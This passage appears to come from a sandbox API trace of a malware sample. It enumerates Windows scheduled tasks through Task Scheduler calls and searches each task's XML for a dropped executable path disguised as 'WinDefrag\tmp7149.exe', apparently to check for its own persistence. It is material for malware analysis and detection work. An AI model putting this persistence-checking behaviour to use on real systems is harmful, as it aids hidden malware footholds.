PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0169.834] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.835] IUnknown:Release (This=0x328250) returned 0x0 [0169.835] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.835] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.836] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.836] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.836] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.836] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.836] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.838] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.838] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.838] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="WindowsParentalControls") returned 0x0 [0169.838] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n") returned 0x0 [0169.841] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.841] IUnknown:Release (This=0x328230) returned 0x0 [0169.841] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.841] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="WindowsParentalControlsMigration") returned 0x0 [0169.841] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n") returned 0x0 [0169.844] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.845] IUnknown:Release (This=0x328230) returned 0x0 [0169.845] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.845] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.846] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.846] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.846] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.846] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.846] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.853] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=4) returned 0x0 [0169.853] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.853] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="AutoWake") returned 0x0 [0169.853] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n") returned 0x0 [0169.856] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.856] IUnknown:Release (This=0x328230) returned 0x0 [0169.856] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.856] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="GadgetManager") returned 0x0 [0169.856] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n") returned 0x0 [0169.859] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.859] IUnknown:Release (This=0x328230) returned 0x0 [0169.859] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.859] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="SessionAgent") returned 0x0 [0169.859] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n") returned 0x0 [0169.864] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.864] IUnknown:Release (This=0x328230) returned 0x0 [0169.864] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.864] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="SystemDataProviders") returned 0x0 [0169.864] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n") returned 0x0 [0169.868] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.868] IUnknown:Release (This=0x328230) returned 0x0 [0169.868] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.868] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.870] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.870] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.870] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.870] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.870] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328110) returned 0x0 [0169.872] IRegisteredTaskCollection:get_Count (in: This=0x328110, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.872] IRegisteredTaskCollection:get_Item (in: This=0x328110, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328280) returned 0x0 [0169.872] IRegisteredTask:get_Name (in: This=0x328280, pName=0x18e230 | out: pName=0x18e230*="SvcRestartTask") returned 0x0 [0169.872] IRegisteredTask:get_Xml (in: This=0x328280, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n") returned 0x0 [0169.874] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.875] IUnknown:Release (This=0x328280) returned 0x0 [0169.875] IUnknown:Release (This=0x328110) returned 0x0 [0169.875] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328110) returned 0x0 [0169.876] ITaskFolderCollection:get_Count (in: This=0x328110, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.876] IUnknown:Release (This=0x328110) returned 0x0 [0169.876] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.876] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.876] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.877] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=0) returned 0x0 [0169.877] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.877] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.878] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.878] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.878] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.878] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.878] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.880] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.880] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.880] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="SR") returned 0x0 [0169.880] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0169.883] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.884] IUnknown:Release (This=0x328250) returned 0x0 [0169.884] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.884] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.885] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.885] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.885] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.885] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.885] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.887] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.887] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.887] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="Interactive") returned 0x0 [0169.887] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n") returned 0x0 [0169.890] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n 